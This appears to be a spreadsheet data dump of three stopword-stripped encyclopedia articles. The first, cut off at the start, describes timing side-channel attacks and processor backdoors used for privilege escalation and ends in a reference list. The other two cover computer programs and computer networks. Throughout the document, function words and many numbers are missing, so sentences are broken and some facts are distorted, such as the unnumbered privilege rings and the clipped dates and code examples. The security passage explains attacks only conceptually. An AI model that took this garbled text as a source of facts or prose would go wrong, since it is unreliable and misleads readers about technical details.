variation target exponent bit, noise results measurement inaccuracies timing variations unknown exponent bits. properties signal noise determine number timing measurements required attack. timing attacks potentially used cryptosystems, including symmetric functions. privilege escalation simple generic processor backdoor used attackers means privilege escalation privileges equivalent given running operating system. also, non-privileged process non-privileged invited domain running virtual machine monitor privileges equivalent virtual machine monitor.loïc duflot studied intel processors paper "cpu bugs, backdoors consequences security" explains processor defines four different privilege rings numbered (most privileged) (least privileged). kernel code usually running ring whereas user-space code generally running ring security-critical assembly language instructions restricted ring code. order escalate privilege backdoor, attacker must activate backdoor placing desired state inject code ring back ring order return system stable state. indeed, code running ring system calls work leaving system ring running random system call (exit() typically) likely crash system.the backdoors loïc duflot presents simple modify behavior three assembly language instructions simple specific activation conditions, unlikely accidentally activated. recent inventions begun target types processor-based escalation attacks. references bibliography acoustic asonov, agrawal, (2004). "keyboard acoustic emanations". ieee symposium security privacy, 2004. proceedings. 2004. proceedings 2004 ieee symposium security privacy. 3–11. citeseerx 10.1.1.89.8231. doi:10.1109/secpri.2004.1301311. isbn 978-0-7695-2136-7. issn 1081-6011. s2cid 216795. zhuang, zhou, feng; tygar, j.d. (2005). "keyboard acoustic emanations revisited". transactions information system security (tissec). proceedings 12th conference computer communications security. transactions information systems. vol. alexandria, virginia, usa: york, usa. 373–382. citeseerx 10.1.1.117.5791. doi:10.1145/1609956.1609959. isbn 978-1-59593-226-6. issn 1094-9224. berger, yigael; wool, avishai; yeredor, arie (2006). "dictionary attacks using keyboard acoustic emanations". proceedings 13th conference computer communications security '06. proceedings 13th conference computer communications security. alexandria, virginia, usa: york, usa. 245–254. citeseerx 10.1.1.99.8028. doi:10.1145/1180405.1180436. isbn 978-1-59593-518-2. s2cid 2596394. backes, michael; dürmuth, markus; gerling, sebastian; pinkal, manfred; sporleder, caroline (2010), "acoustic side-channel attacks printers" (pdf), proceedings 19th usenix security symposium, washington, isbn 978-1-931971-77-5 cache attack osvik, arne; shamir, adi; tromer, eran (2006). "cache attacks countermeasures: case aes". topics cryptology ct-rsa 2006. topics cryptology ct-rsa. lecture notes computer science. vol. 3860. jose, california, usa: springer-verlag berlin, heidelberg. 1–20. citeseerx 10.1.1.60.1857. doi:10.1007/11605805_1. isbn 978-3-540-31033-4. issn 0302-9743. page, daniel (2005), "partitioned cache architecture side-channel defence mechanism" (pdf), cryptology eprint archive bertoni, guido; zaccaria, vittorio; breveglieri, luca; monchiero, matteo; palermo, gianluca (2005). "aes power attack based induced cache miss countermeasure" (pdf). international conference information technology: coding computing (itcc'05) volume international conference information technology: coding computing (itcc'05). vol. washington, usa: ieee computer society, alamitos, california, usa. 586–591. citeseerx 10.1.1.452.3319. doi:10.1109/itcc.2005.62. isbn 978-0-7695-2315-6. s2cid 9364961. chemical gutmann, peter (2001), "data remanence semiconductor devices" (pdf), proceedings 10th conference usenix security symposium ssym'01, usenix association berkeley, california, usa, vol. archived original (pdf) 2007-02-21, retrieved 2010-12-13 electromagnetic kuhn, markus anderson, ross (1998). "soft tempest: hidden data transmission using electromagnetic emanations". information hiding. lecture notes computer science. lecture notes computer science. vol. 1525. 124–142. citeseerx 10.1.1.64.6982. doi:10.1007/3-540-49380-8_10. isbn 978-3-540-65386-8. eck, wim; laborato, neher (1985), "electromagnetic radiation video display units: eavesdropping risk?", computers security, vol. 269–286, citeseerx 10.1.1.35.1695, doi:10.1016/0167-4048(85)90046-x kuhn, markus (2002). "optical time-domain eavesdropping risks displays". proceedings 2002 ieee symposium security privacy. proceedings 2002 ieee symposium security privacy. citeseerx 10.1.1.7.5870. doi:10.1109/secpri.2002.1004358. isbn 978-0-7695-1543-4. s2cid 2385507. vuagnoux, martin; pasini, sylvain (2009), "compromising electromagnetic emanations wired wireless keyboards" (pdf), proceedings 18th conference usenix security symposium (ssym'09), 1–16 backes, michael; dürmuth, markus; unruh, dominique (2008). "optical time-domain eavesdropping risks displays" (pdf). compromising reflections-or-how read monitors around corner. proceedings ieee symposium security privacy. oakland, california, usa. 158–169. citeseerx 10.1.1.7.5870. doi:10.1109/secpri.2002.1004358. isbn 978-0-7695-3168-7. s2cid 2385507. firewire dornseif, maximillian (2004), "0wned ipod" (pdf), pacsec dornseif, maximillian (2005), "firewire memory belong (pdf), cansecwest, archived original (pdf) 2009-12-29, retrieved 2010-12-17 processor backdoors duflot, loïc (2008). "cpu bugs, backdoors consequences security". computer security esorics 2008. esorics proceedings 13th european symposium research computer security: computer security. lecture notes computer science. vol. 5283. 580–599. doi:10.1007/978-3-540-88313-5_37. isbn 978-3-540-88312-8. duflot, loïc (2008), "using system management mode circumvent operating system security functions" (pdf), proceedings cansecwest, 580–599, archived original (pdf) 2006-05-26 waksman, adam (2010), "tamper evident microprocessors" (pdf), proceedings ieee symposium security privacy, oakland, california, archived original (pdf) 2013-09-21 temperature skorobogatov, sergei (2002), "low temperature data remanence static ram" (pdf), technical report university cambridge. computer laboratory, cambridge, university cambridge computer laboratory, issn 1476-2986 halderman, alex; schoen, seth heninger, nadia; clarkson, william; paul, william; calandrino, joseph feldman, ariel appelbaum, jacob; felten, edward (2008). "lest remember: cold boot attacks encryption keys". communications security browser (pdf). proceedings usenix security symposium. vol. york, york, usa. 45–60. doi:10.1145/1506409.1506429. isbn 978-1-931971-60-7. issn 0001-0782. s2cid 7770695. archived original (pdf) 2011-09-04. timing attacks song, dawn xiaodong; wagner, david; tian, xuqing (2001), "timing analysis keystrokes timing attacks ssh" (pdf), proceedings 10th conference usenix security symposium, washington, d.c., usa: usenix association berkeley, california, usa, vol. 337–352 kocher, paul (1996). "timing attacks implementations diffie-hellman, rsa, dss, other systems". advances cryptology crypto '96. proceedings 16th annual international cryptology conference advances cryptology crypto '96. lecture notes computer science. vol. 1109. santa barbara, california, usa: springer-verlag, london, 104–113. citeseerx 10.1.1.40.5024. doi:10.1007/3-540-68697-5_9. isbn 978-3-540-61512-5. brumley, david; boneh, (2003), "remote timing attacks practical" (pdf), proceedings 12th conference usenix security symposium ssym'03, washington, usa: usenix association berkeley, california, usa, vol. 701, citeseerx 10.1.1.12.2615, doi:10.1016/j.comnet.2005.01.010 other balzarotti, cova, vigna, (2008). "clear shot: eavesdropping keyboard input video". 2008 ieee symposium security privacy 2008). security privacy, 2008. 2008. ieee symposium oakland, 170–183. citeseerx 10.1.1.219.239. doi:10.1109/sp.2008.28. isbn 978-0-7695-3168-7. issn 1081-6011. s2cid 1498613. duflot, loïc (2007), contribution sécurité systèmes d'exploitation microprocesseurs (pdf) french)</t>
  </si>
  <si>
    <t>Computer program</t>
  </si>
  <si>
    <t>computer program sequence instructions programming language computer execute. computer programs component software, also includes documentation intangible components.a computer program human-readable form called source code. source code needs another computer program execute computers execute native machine instructions. therefore, source code translated machine instructions using language's compiler. (machine language programs translated using assembler.) resulting file called executable. alternatively, source code execute within language's interpreter.if executable requested execution, operating system loads memory starts process. central processing unit soon switch process fetch, decode, execute machine instruction.if source code requested execution, operating system loads corresponding interpreter memory starts process. interpreter loads source code memory translate execute statement. running source code slower running executable. moreover, interpreter must installed computer. example computer program "hello, world!" program used illustrate language's basic syntax. syntax interpreted language basic (1964) intentionally limited make language easy learn. example, variables declared used. also, variables automatically initialized zero. here example computer program, basic, average list numbers: once mechanics basic computer programming learned, sophisticated powerful languages available build large computer systems. history improvements software development result improvements computer hardware. stage hardware's history, task computer programming changed dramatically. analytical engine 1837, charles babbage inspired jacquard's loom attempt build analytical engine. names components calculating device borrowed textile industry. textile industry, yarn brought store milled. device "store" memory hold 1,000 numbers decimal digits each. numbers "store" transferred "mill" processing. programmed using sets perforated cards. directed operation inputted variables. however, 17,000 pounds british government's money, thousands cogged wheels gears never fully worked together.ada lovelace worked charles babbage create description analytical engine (1843). description contained note completely detailed method calculating bernoulli numbers using analytical engine. this note recognized historians world's first computer program. universal turing machine 1936, alan turing introduced universal turing machine, theoretical device model every computation. finite-state machine infinitely long read/write tape. machine move tape back forth, changing contents performs algorithm. machine starts initial state, goes sequence steps, halts encounters halt state. present-day computers turing complete. eniac electronic numerical integrator computer (eniac) built july 1943 fall 1945. turing complete, general-purpose computer used 17,468 vacuum tubes create circuits. core, series pascalines wired together. units weighed tons, occupied 1,800 square feet (167 m2), consumed $650 hour 1940s currency) electricity idle. base-10 accumulators. programming eniac took months. three function tables wheels needed rolled fixed function panels. function tables connected function panels plugging heavy black cables plugboards. each function table rotating knobs. programming eniac also involved setting 3,000 switches. debugging program took week. 1947 1955 aberdeen proving ground, calculating hydrogen bomb parameters, predicting weather patterns, producing firing tables artillery guns. stored-program computers instead plugging cords turning switches, stored-program computer loads instructions memory like loads data memory. result, computer could programmed quickly perform calculations fast speeds. presper eckert john mauchly built eniac. engineers introduced stored-program concept three-page memo dated february 1944. later, september 1944, john neumann began working eniac project. june 1945, neumann published first draft report edvac equated structures computer structures human brain. design became known neumann architecture. architecture simultaneously deployed constructions edvac edsac computers 1949.the system/360 (1964) line computers, instruction architecture. model smallest least expensive. customers could upgrade retain application software. model premium. each system/360 model featured multiprogramming—having multiple processes memory once. when process waiting input/output, another could compute. planned model programmed using pl/1. committee formed included cobol, fortran algol programmers. purpose develop language comprehensive, easy use, extendible, would replace cobol fortran. result large complex language took long time compile. computers manufactured 1970s front-panel switches manual programming. computer program written paper reference. instruction represented configuration on/off settings. after setting configuration, execute button pressed. this process repeated. computer programs also automatically inputted paper tape punched cards. after medium loaded, starting address switches, execute button pressed. very large scale integration major milestone software development invention very large scale integration (vlsi) circuit (1964). following world tube based technology replaced point-contact transistors (1947) bipolar junction transistors (late 1950s) mounted circuit board. during 1960s, aerospace industry replaced circuit board integrated circuit chip.robert noyce, co-founder fairchild semiconductor (1957) intel (1968), achieved technological improvement refine production field-effect transistors (1963). goal alter electrical resistivity conductivity semiconductor junction. first, naturally occurring silicate minerals converted polysilicon rods using siemens process. czochralski process converts rods monocrystalline silicon, boule crystal. crystal thinly sliced form wafer substrate. planar process photolithography integrates unipolar transistors, capacitors, diodes, resistors onto wafer build matrix metal–oxide–semiconductor (mos) transistors. transistor primary component integrated circuit chips.originally, integrated circuit chips function manufacturing. during 1960s, controlling electrical flow migrated programming matrix read-only memory (rom). matrix resembled dimensional array fuses. process embed instructions onto matrix burn unneeded connections. there many connections, firmware programmers wrote computer program another chip oversee burning. technology became known programmable rom. 1971, intel installed computer program onto chip named intel 4004 microprocessor. terms microprocessor central processing unit (cpu) used interchangeably. however, cpus predate microprocessors. example, system/360 (1964) made circuit boards containing discrete components ceramic substrates. state 8008 intel 4004 (1971) 4-bit microprocessor designed busicom calculator. five months release, intel released intel 8008, 8-bit microprocessor. bill pentz team sacramento state build first microcomputer using intel 8008: state 8008 (1972). purpose store patient medical records. computer supported disk operating system memorex, 3-megabyte, hard disk drive. color display keyboard packaged single console. disk operating system programmed using ibm's basic assembly language (bal). medical records application programmed using basic interpreter. however, computer evolutionary dead-end extremely expensive. also, built public university specific purpose. nonetheless, project contributed development intel 8080 (1974) instruction set. series 1978, modern software development environment began intel upgraded intel 8080 intel 8086. intel simplified intel 8086 manufacture cheaper intel 8088. embraced intel 8088 entered personal computer market (1981). consumer demand personal computers increased, intel's microprocessor development. succession development known series. assembly language family backward-compatible machine instructions. machine instructions created earlier microprocessors retained throughout microprocessor upgrades. this enabled consumers purchase computers without purchase application software. major categories instructions are: memory instructions access numbers strings random-access memory. integer arithmetic logic unit (alu) instructions perform primary arithmetic operations integers. floating point instructions perform primary arithmetic operations real numbers. call stack instructions push words needed allocate memory interface functions. single instruction, multiple data (simd) instructions increase speed multiple processors available perform algorithm array data. changing programming environment vlsi circuits enabled programming environment advance computer terminal (until 1990s) graphical user interface (gui) computer. computer terminals limited programmers single shell running command-line environment. during 1970s, full-screen source code editing became possible text-based user interface. regardless technology available, goal program programming language. programming paradigms languages programming language features exist provide building blocks combined express programming ideals. ideally, programming language should: express ideas directly code. express independent ideas independently. express relationships among ideas directly code. combine ideas freely. combine ideas combinations make sense. express simple ideas simply.the programming style programming language provide building blocks categorized programming paradigms. example, different paradigms differentiate: procedural languages, functional languages, logical languages. different levels data abstration. different levels class hierarchy. different levels input datatypes, container types generic programming.each programming styles contributed synthesis different programming languages.a programming language keywords, symbols, identifiers, rules programmers communicate instructions computer. they follow rules called syntax. keywords reserved words form declarations statements. symbols characters form operations, assignments, control flow, delimiters. identifiers words created programmers form constants, variable names, structure names, function names. syntax rules defined backus–naur form.programming languages basis formal languages. purpose defining solution terms formal language generate algorithm solve underlining problem. algorithm sequence simple instructions solve problem. generations programming language evolution programming language began edsac (1949) used first stored computer program neumann architecture. programming edsac first generation programming language. first generation programming language machine language. machine language requires programmer enter instructions using instruction numbers called machine code. example, operation pdp-11 instruction number 24576.the second generation programming language assembly language. assembly language allows programmer mnemonic instructions instead remembering instruction numbers. assembler translates assembly language mnemonic machine language number. example, pdp-11, operation 24576 referenced source code. four basic arithmetic operations assembly instructions like add, sub, mul, div. computers also instructions like (define word) reserve memory cells. then instruction copy integers registers memory.the basic structure assembly language statement label, operation, operand, comment.labels allow programmer work variable names. assembler later translate labels physical memory addresses. operations allow programmer work mnemonics. assembler later translate mnemonics instruction numbers. operands tell assembler data operation process. comments allow programmer articulate narrative instructions alone vague. characteristic assembly language program forms one-to-one mapping corresponding machine language target.the third generation programming language uses compilers interpreters execute computer programs. distinguishing feature third generation language independence particular hardware. early languages include fortran (1958), cobol (1959), algol (1960), basic (1964). 1973, programming language emerged high-level language produced efficient machine language instructions. whereas third-generation languages historically generated many machine instructions statement, statements generate single machine instruction. moreover, optimizing compiler might overrule programmer produce fewer machine instructions statements. today, entire paradigm languages fill imperative, third generation spectrum.the fourth generation programming language emphasizes output results desired, rather programming statements constructed. declarative languages attempt limit side effects allow programmers write code relatively errors. popular fourth generation language called structured query language (sql). database developers longer need process database record time. also, simple instruction generate output records without understand retrieved. imperative languages imperative languages specify sequential algorithm using declarations, expressions, statements: declaration introduces variable name computer program assigns datatype example: integer; expression yields value example: yields statement might assign expression variable value variable alter program's control flow example: do_something(); fortran fortran (1958) unveiled "the mathematical formula translating system." designed scientific calculations, without string handling facilities. along declarations, expressions, statements, supported: arrays. subroutines. "do" loops.it succeeded because: programming debugging costs computer running costs. supported ibm. applications time scientific.however, vendors also wrote fortran compilers, syntax would likely fail ibm's compiler. american national standards institute (ansi) developed first fortran standard 1966. 1978, fortran became standard 1991. fortran supports: records. pointers arrays. cobol cobol (1959) stands "common business oriented language." fortran manipulated symbols. soon realized symbols need numbers, strings introduced. department defense influenced cobol's development, grace hopper major contributor. statements english-like verbose. goal design language managers could read programs. however, lack structured statements hindered goal.cobol's development tightly controlled, dialects emerge require ansi standards. consequence, changed years 1974. 1990s version make consequential changes, like object-oriented programming. algol algol (1960) stands "algorithmic language." profound influence programming language design. emerging committee european american programming language experts, used standard mathematical notation readable structured design. algol first define syntax using backus–naur form. this syntax-directed compilers. added features like: block structure, variables local block. arrays variable bounds. "for" loops. functions. recursion.algol's direct descendants include pascal, modula-2, ada, delphi oberon branch. another branch there's java. basic basic (1964) stands "beginner's purpose symbolic instruction code." developed dartmouth college students learn. student powerful language, student would still remember basic. basic interpreter installed microcomputers manufactured late 1970s. microcomputer industry grew, language.basic pioneered interactive session. offered operating system commands within environment: 'new' command created empty slate. statements evaluated immediately. statements could programmed preceding line number. 'list' command displayed program. 'run' command executed program.however, basic syntax simple large programs. recent dialects added structure object-oriented extensions. microsoft's visual basic still widely used produces graphical user interface. programming language (1973) name language bcpl replaced at&amp;t bell labs called next version "c." purpose write unix operating system. relatively small language, making easy write compilers. growth mirrored hardware growth 1980s. growth also facilities assembly language, uses high-level syntax. added advanced features like: inline assembler. arithmetic pointers. pointers functions. operations. freely combining complex operators. allows programmer control region memory data stored. global variables static variables require fewest clock cycles store. stack automatically used standard variable declarations. heap memory returned pointer variable malloc() function. global static data region located program region. (the program region technically called text region. it's machine instructions stored.)the global static data region technically regions. region called initialized data segment, variables declared default values stored. region called block started segment, variables declared without default values stored. variables stored global static data region addresses compile-time. they retain values throughout life process.the global static region stores global variables declared (outside) main() function. global variables visible main() every function source code.on hand, variable declarations inside main(), functions, within block delimiters local variables. local variables also include formal parameter variables. parameter variables enclosed within parenthesis function definitions. they provide interface function.local variables declared using static prefix also stored global static data region. unlike global variables, static variables visible within function block. static variables always retain value. example usage would function increment_counter(){ static counter counter++; return counter;}the stack region contiguous block memory located near memory address. variables placed stack populated bottom (not bottom top). stack pointer special-purpose register keeps track last memory address populated. variables placed stack assembly language push instruction. therefore, addresses variables runtime. method stack variables lose scope instruction.local variables declared without static prefix, including formal parameter variables, called automatic variables stored stack. they visible inside function block lose scope upon exiting function block.the heap region located stack. populated bottom top. operating system manages heap using heap pointer list allocated memory blocks. like stack, addresses heap variables runtime. memory error occurs heap pointer stack pointer meet.c provides malloc() library function allocate heap memory. populating heap data additional copy function. variables stored heap economically passed functions using pointers. without pointers, entire block data would passed function stack. 1970s, software engineers needed language support break large projects modules. obvious feature decompose large projects physically separate files. less obvious feature decompose large projects logically abstract datatypes. time, languages supported concrete (scalar) datatypes like integer numbers, floating-point numbers, strings characters. concrete datatypes representation part name. abstract datatypes structures concrete datatypes, name assigned. example, list integers could called integer_list. object-oriented jargon, abstract datatypes called classes. however, class definition; memory allocated. when memory allocated class, called object.object-oriented imperative languages developed combining need classes need safe functional programming. function, object-oriented language, assigned class. assigned function referred method, member function, operation. object-oriented programming executing operations objects.object-oriented languages support syntax model subset/superset relationships. theory, element subset inherits attributes contained superset. example, student person. therefore, students subset persons. result, students inherit attributes common persons. additionally, students unique attributes persons have. object-oriented languages model subset/superset relationships using inheritance. object-oriented programming became dominant language paradigm late 1990s.c++ (1985) originally called classes." designed expand capabilities adding object-oriented facilities language simula.an object-oriented module composed files. definitions file called header file. here header file grade class simple school application: constructor operation function name class name. executed calling operation executes statement. module's file source file. here source file grade class simple school application: here header file person class simple school application: here source file person class simple school application: here header file student class simple school application: here source file student class simple school application: here driver program demonstration: here makefile compile everything: declarative languages imperative languages major criticism: assigning expression non-local variable produce unintended side effect. declarative languages generally omit assignment statement control flow. they describe computation performed compute broad categories declarative languages functional languages logical languages. principle behind functional language lambda calculus guide well defined semantic. mathematics, function rule maps elements expression range values. consider function: times_10(x) expression mapped function times_10() range values. value happens this occurs application function mathematically written times_10(2) functional language compiler store value variable. instead, push value onto computer's stack setting program counter back calling function. calling function value stack.imperative languages support functions. therefore, functional programming achieved imperative language, programmer uses discipline. however, functional language force discipline onto programmer syntax. functional languages syntax tailored emphasize what.a functional program developed primitive functions followed single driver function. consider snippet: function max(a,b){ code omitted function min(a,b){ code omitted function difference_between_largest_and_smallest(a,b,c) return max(a,max(b,c)) min(a, min(b,c));} primitives max() min(). driver function difference_between_largest_and_smallest(). executing: put(difference_between_largest_and_smallest(10,4,7)); output functional languages used computer science research explore language features. moreover, lack side-effects made popular parallel programming concurrent programming. however, application developers prefer object-oriented features imperative languages. lisp lisp (1958) stands "list processor." tailored process lists. full structure data formed building lists lists. memory, tree data structure built. internally, tree structure lends nicely recursive functions. syntax build tree enclose space-separated elements within parenthesis. following list three elements. first elements lists elements: (hello world) lisp functions extract reconstruct elements. function head() returns list containing first element list. function tail() returns list containing everything first element. function cons() returns list concatenation lists. therefore, following expression return list cons(head(x), tail(x)) drawback lisp many functions nested, parentheses look confusing. modern lisp environments help ensure parenthesis match. aside, lisp support imperative language operations assignment statement goto loops. also, lisp concerned datatype elements compile time. instead, assigns (and reassign) datatypes runtime. assigning datatype runtime called dynamic binding. whereas dynamic binding increases language's flexibility, programming errors linger late software development process.writing large, reliable, readable lisp programs requires forethought. properly planned, program much shorter equivalent imperative language program. lisp widely used artificial intelligence. however, usage accepted imperative language operations, making unintended side-effects possible. (1973) stands "meta language." checks make sure data type compared another. example, function input parameter integer) returns integer: parenthesis-eccentric like lisp. following application times_10(): times_10 returns int". (both results datatype returned.) like lisp, tailored process lists. unlike lisp, element datatype. moreover, assigns datatype element compile-time. assigning datatype compile-time called static binding. static binding increases reliability compiler checks context variables used. prolog prolog (1972) stands "programming logic." designed process natural languages. building blocks prolog program objects relationships objects. objects built stating true facts them.set theory facts formed assigning objects sets. syntax setname(object). animal.animal(cat).mouse animal.animal(mouse).tom cat.cat(tom).jerry mouse.mouse(jerry).adjective facts formed using adjective(object). big.big(cat).mouse small.small(mouse).relationships formed using multiple items inside parentheses. example verb(object,object) verb(adjective,adjective). mouse eats cheese.eat(mouse,cheese).big animals small animals.eat(big,small).after facts relationships entered, question asked: will jerry? eat(tom,jerry).prolog's usage expanded become goal-oriented language. goal-oriented application, goal defined providing list subgoals. then subgoal defined providing list subgoals, etc. path subgoals fails find solution, subgoal backtracked another path systematically attempted. practical applications include solving shortest path problem producing family trees. object-oriented programming object-oriented programming programming method execute operations (functions) objects. basic idea group characteristics phenomenon object container give container name. operations phenomenon also grouped container. object-oriented programming developed combining need containers need safe functional programming. this programming method need confined object-oriented language. object-oriented language, object container called class. non-object-oriented language, data structure (which also known record) become object container. turn data structure object container, operations need written specifically structure. resulting structure called abstract datatype. however, inheritance missing. nonetheless, shortcoming overcome. here programming language header file grade abstract datatype simple school application: grade_new() function performs algorithm constructor operation. here programming language source file grade abstract datatype simple school application: constructor, function calloc() used instead malloc() memory cell zero. here programming language header file person abstract datatype simple school application: here programming language source file person abstract datatype simple school application: here programming language header file student abstract datatype simple school application: here programming language source file student abstract datatype simple school application: here driver program demonstration: here makefile compile everything: formal strategy build object-oriented objects identify objects. most likely nouns. identify object's attributes. what helps describe object? identify object's actions. most likely verbs. identify relationships object object. most likely verbs.for example: person human identified name. grade achievement identified letter. student person earns grade. syntax semantics syntax programming language list production rules govern form. programming language's form correct placement declarations, expressions, statements. complimenting syntax language semantics. semantics describe meanings attached various syntactic constructs. syntactic construct need semantic description form invalid interpretation. also, different languages might syntax; however, behaviors different. syntax language formally described listing production rules. whereas syntax natural language extremely complicated, subset english language production rule listing: sentence made noun-phrase followed verb-phrase; noun-phrase made article followed adjective followed noun; verb-phrase made verb followed noun-phrase; article 'the'; adjective 'big' adjective 'small'; noun 'cat' noun 'mouse'; verb 'eats';the words bold-face known "non-terminals". words 'single quotes' known "terminals".from production rule listing, complete sentences formed using series replacements. process replace non-terminals either valid non-terminal valid terminal. replacement process repeats terminals remain. valid sentence sentence noun-phrase verb-phrase article adjective noun verb-phrase adjective noun verb-phrase noun verb-phrase verb-phrase verb noun-phrase eats noun-phrase eats article adjective noun eats adjective noun eats small noun eats small mousehowever, another combination results invalid sentence: small mouse eats cattherefore, semantic necessary correctly describe meaning activity. production rule listing method called backus–naur form (bnf). describes syntax language syntax. this recursive definition example meta-language. syntax includes: translates made a[n] non-terminal right. translates terminal right. translates surround non-terminals.using bnf, subset english language production rule listing: using bnf, signed-integer production rule listing: notice recursive production rule: this allows infinite number possibilities. therefore, semantic necessary describe limitation number digits. notice leading zero possibility production rules: therefore, semantic necessary describe leading zeros need ignored. formal methods available describe semantics. they denotational semantics axiomatic semantics. software engineering computer programming software engineering variety techniques produce quality software. computer programming process writing editing source code. formal environment, systems analyst gather information managers organization's processes automate. this professional prepares detailed plan modified system. plan analogous architect's blueprint. performance objectives systems analyst objective deliver right information right person right time. critical factors achieve objective are: quality output. output useful decision-making? accuracy output. does reflect true situation? format output. output easily understood? speed output. time sensitive information important communicating customer real-time. cost objectives achieving performance objectives balanced costs, including: development costs. uniqueness costs. reusable system expensive. however, might preferred limited-use system. hardware costs. operating costs.applying systems development process mitigate axiom: later process error detected, expensive correct. waterfall model waterfall model implementation systems development process. waterfall label implies, basic phases overlap other: investigation phase understand underlying problem. analysis phase understand possible solutions. design phase plan best solution. implementation phase program best solution. maintenance phase lasts throughout life system. changes system deployed necessary. faults exist, including specification faults, design faults, coding faults. improvements necessary. adaption necessary react changing environment. computer programmer computer programmer specialist responsible writing modifying source code implement detailed plan. programming team likely needed systems large completed single programmer. however, adding programmers project shorten completion time. instead, lower quality system. effective, program modules need defined distributed team members. also, team members must interact another meaningful effective way.computer programmers programming-in-the-small: programming within single module. chances module execute modules located source code files. therefore, computer programmers programming-in-the-large: programming modules effectively couple other. program modules modular programming technique refine imperative language programs. refined programs reduce software size, separate responsibilities, thereby mitigate software aging. program module sequence statements bounded within block together identified name. modules function, context, logic: function module does. context module elements performed upon. logic module performs function.the module's name derived first function, context. logic part name. example, function compute_square_root( function compute_square_root_integer( integer appropriate module names. however, function compute_square_root_by_division( not. degree interaction within module level cohesion. cohesion judgement relationship module's name function. degree interaction modules level coupling. coupling judgement relationship module's context elements performed upon. cohesion levels cohesion worst best are: coincidental cohesion: module coincidental cohesion performs multiple functions, functions completely unrelated. example, function read_sales_record_print_next_line_convert_to_f</t>
  </si>
  <si>
    <t>Computer networks</t>
  </si>
  <si>
    <t>computer network computers sharing resources located provided network nodes. computers common communication protocols digital interconnections communicate other. these interconnections made telecommunication network technologies, based physically wired, optical, wireless radio-frequency methods arranged variety network topologies. nodes computer network include personal computers, servers, networking hardware, specialised general-purpose hosts. they identified network addresses, hostnames. hostnames serve memorable labels nodes, rarely changed initial assignment. network addresses serve locating identifying nodes communication protocols internet protocol. computer networks classified many criteria, including transmission medium used carry signals, bandwidth, communications protocols organize network traffic, network size, topology, traffic control mechanism, organizational intent. computer networks support many applications services, access world wide web, digital video, digital audio, shared application storage servers, printers, machines, email instant messaging applications. history computer networking considered branch computer science, computer engineering, telecommunications, since relies theoretical practical application related disciplines. computer networking influenced wide array technology developments historical milestones. late 1950s, network computers built u.s. military semi-automatic ground environment (sage) radar system using bell modem. first commercial modem computers, released at&amp;t corporation 1958. modem allowed digital data transmitted regular unconditioned telephone lines speed bits second (bit/s). 1959, christopher strachey filed patent application time-sharing john mccarthy initiated first project implement time-sharing user programs mit. stratchey passed concept licklider inaugural unesco information processing conference paris year. mccarthy instrumental creation three earliest time-sharing systems (compatible time-sharing system 1961, time-sharing system 1962, dartmouth time sharing system 1963). 1959, anatoly kitov proposed central committee communist party soviet union detailed plan re-organisation control soviet armed forces soviet economy basis network computing centres. kitov's proposal rejected, later 1962 ogas economy management network project. 1960, commercial airline reservation system semi-automatic business research environment (sabre) went online connected mainframes. 1963, licklider sent memorandum office colleagues discussing concept "intergalactic computer network", computer network intended allow general communications among computer users. throughout 1960s, paul baran donald davies independently developed concept packet switching transfer information computers network. davies pioneered implementation concept. network, local area network national physical laboratory (united kingdom) used line speed kbit/s later high-speed links (1.544 mbit/s line rate). 1965, western electric introduced first widely used telephone switch implemented computer control switching fabric. 1969, first four nodes arpanet connected using kbit/s circuits university california angeles, stanford research institute, university california santa barbara, university utah. early 1970s, leonard kleinrock carried mathematical work model performance packet-switched networks, underpinned development arpanet. theoretical work hierarchical routing late 1970s student farouk kamoun remains critical operation internet today. 1972, commercial services first deployed public data networks europe, began using x.25 late 1970s spread across globe. underlying infrastructure used expanding tcp/ip networks 1980s. 1973, french cyclades network first make hosts responsible reliable delivery data, rather centralized service network itself. 1973, robert metcalfe wrote formal memo xerox parc describing ethernet, networking system based aloha network, developed 1960s norman abramson colleagues university hawaii. july 1976, robert metcalfe david boggs published paper "ethernet: distributed packet switching local computer networks" collaborated several patents received 1977 1978. 1974, vint cerf, yogen dalal, carl sunshine published transmission control protocol (tcp) specification, 675, coining term internet shorthand internetworking. 1976, john murphy datapoint corporation created arcnet, token-passing network first used share storage devices. 1977, first long-distance fiber network deployed long beach, california. 1977, xerox network systems (xns) developed robert metcalfe yogen dalal xerox. 1979, robert metcalfe pursued making ethernet open standard. 1980, ethernet upgraded original 2.94 mbit/s protocol mbit/s protocol, developed crane, garner, ogus, yogen dalal. 1995, transmission speed capacity ethernet increased mbit/s mbit/s. 1998, ethernet supported transmission speeds gbit/s. subsequently, higher speeds gbit/s added 2018). scaling ethernet contributing factor continued use. computer network extends interpersonal communications electronic means various technologies, email, instant messaging, online chat, voice video telephone calls, video conferencing. network allows sharing network computing resources. users access resources provided devices network, printing document shared network printer shared storage device. network allows sharing files, data, types information giving authorized users ability access information stored computers network. distributed computing uses computing resources across network accomplish tasks. network packet most modern computer networks protocols based packet-mode transmission. network packet formatted unit data carried packet-switched network. packets consist types data: control information user data (payload). control information provides data network needs deliver user data, example, source destination network addresses, error detection codes, sequencing information. typically, control information found packet headers trailers, payload data between. with packets, bandwidth transmission medium better shared among users network circuit switched. when user sending packets, link filled packets users, cost shared, relatively little interference, provided link overused. often route packet needs take network immediately available. case, packet queued waits link free. physical link technologies packet network typically limit size packets certain maximum transmission unit (mtu). longer message fragmented transferred packets arrive, reassembled construct original message. network topology physical geographic locations network nodes links generally relatively little effect network, topology interconnections network significantly affect throughput reliability. with many technologies, star networks, single failure cause network fail entirely. general, interconnections are, robust network expensive install. therefore network diagrams arranged network topology logical interconnections network hosts. common layouts are: network: nodes connected common medium along medium. this layout used original ethernet, called 10base5 10base2. this still common topology data link layer, although modern physical layer variants point-to-point links instead, forming star tree. star network: nodes connected special central node. this typical layout found small switched ethernet lan, client connects central network switch, logically wireless lan, wireless client associates central wireless access point. ring network: node connected left right neighbour node, nodes connected node reach node traversing nodes left- rightwards. token ring networks, fiber distributed data interface (fddi), made topology. mesh network: node connected arbitrary number neighbours least traversal node other. fully connected network: node connected every node network. tree network: nodes arranged hierarchically. this natural topology larger ethernet network multiple switches without redundant meshing.the physical layout nodes network necessarily reflect network topology. example, fddi, network topology ring, physical topology often star, neighboring connections routed central physical location. physical layout completely irrelevant, however, common ducting equipment locations represent single points failure issues like fires, power failures flooding. overlay network overlay network virtual network built another network. nodes overlay network connected virtual logical links. each link corresponds path, perhaps many physical links, underlying network. topology overlay network (and often does) differ underlying one. example, many peer-to-peer networks overlay networks. they organized nodes virtual system links internet.overlay networks around since invention networking computer systems connected telephone lines using modems data network existed. striking example overlay network internet itself. internet initially built overlay telephone network. even today, internet node communicate virtually underlying mesh sub-networks 